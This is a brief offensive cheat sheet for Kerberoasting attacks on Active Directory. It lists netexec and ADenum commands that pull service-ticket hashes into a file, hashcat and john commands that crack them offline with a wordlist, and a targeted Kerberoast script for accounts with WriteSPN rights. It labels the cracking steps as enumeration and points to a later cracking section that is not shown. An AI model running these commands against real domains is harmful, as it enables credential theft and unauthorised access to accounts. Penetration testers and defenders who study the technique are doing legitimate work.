Kerberoasting

1.0 Enumeration

netexec ldap $ip -u username -p password --kerberoasting users.khash

# ADenum: https://github.com/SecuProject/ADenum
adenum -d $domain.local -ip $dcip -u $user -p $pass -c

hashcat -m 13100 --force -a 0 users.khash /path/to/word.list

john --format=krb5tgs --wordlist=/path/to/word.list users.khash

If a user has WriteSPN privilege to another one, you can start a targeted Kerberoast attack:

python targetedKerberoast.py -d $domain -vv -u $user -p $pass

Afterwards, proceed with 2.0 Cracking